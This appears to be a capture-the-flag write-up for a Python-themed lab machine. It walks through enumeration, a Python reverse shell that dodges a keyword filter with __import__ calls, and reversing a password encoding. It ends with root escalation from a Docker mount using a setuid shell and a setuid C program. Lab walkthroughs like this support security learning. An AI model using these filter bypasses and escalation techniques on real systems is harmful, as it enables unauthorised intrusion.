Be creative!
Since the title name Python surely we will encounter a lot with python so let's get started!
Enumeration
Let's do nmap first and see what do we get.
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
80/tcp open http syn-ack ttl 60 Node.js Express frameworkPort 80 (HTTP)
Inside the page we can find the login and sign up.
But both the login and signup page cannot open and give us that output. So let use Gobuster to check any files or directory available.
Let’s take a look at the admin.html page.
We got the admin login page? But we do not have any credentials yet so let's open the page source.
By looking at the source code we know that the real password is encoded with int_array_to_text() & string_to_int_array() but we got another html page. Let's try that one first!
Nice! Now we need to run a reverse shell using python. But the problem is if we put the normal reverse shell it getting Security threat detected! So I found another way to reverse shell knowing that import detected as a threat.
socket = __import__("socket")
subprocess = __import__("subprocess")
os = __import__("os")
Flag 1
The user is root? But lets put it aside and cat the flag. So we got our first flag!
Flag 2
If we remember correctly there is a hash that encoded with multiple functions. It using php so I convert it using python.
#String to Integer Array
def str_to_int(temp):
listarr = []
for i in temp:
print(ord(i)/26)
print(ord(i)%26)
listarr.append(ord(i)/26)
listarr.append(ord(i)%26)
return listarr#Integer Array to String
def int_to_str(temp):
strs = ""
for i in temp:
strs += chr(i+97)
return strs
To get the password back we need to do some reversing and it took me a while to reverse it haha.
#Strings to Integer Array
def rev_int_to_str(temp):
strs = []
for i in temp:
strs.append(ord(i)-97)
return strs#Integer Array to strings
def rev_str_to_int(temp):
strs = ""
for i in range(0,len(temp)-1,2):
temp2 = 0
temp2 = int(temp[i]*26)
temp2 += int(temp[i+1])
strs += chr(temp2)
return strs
So to crack the password we need to reverse the function. It should look like this
rev_str_to_int(rev_int_to_str(rev_str_to_int(rev_int_to_str(hash))))We got the password! Okay since we know that Connor is the one who secures the password so let's try to ssh with that user. It's working and we can cat the second flag!
Flag 3
I try to use linpeas but it seems like I can’t relate things haha. But if we remember correctly the first shell we have is a root in a docker container. So it must relate to that one. After a lot enumeration we can see that there is a mount point in the docker container. I try to create a unique file name as h0j3n.txt and try to find it on Connor shell using this command.
find / -name h0j3n.txt 2>/dev/nullYess! We manage to find it on Connor. So there are many ways to upgrade Connor to root so I will show you 2 ways to do so!
First
#Docker Container
cp /bin/sh /mnt/log
chmod +s sh#Connor Shell
/var/log/sh -p
Second
#include <unistd.h>int main()
{
setuid(0);execl("/bin/bash", "bash", (char *)NULL);return 0;
}
Create one file with this code.
#Docker Container
gcc shell.c -o shell
chmod +s shell#Connor Shell
/var/log/shell
If there is any suggestion please tell me or if there is something that I can improve also please do tell me. Hope this writeup help anyone and let’s learn together :)
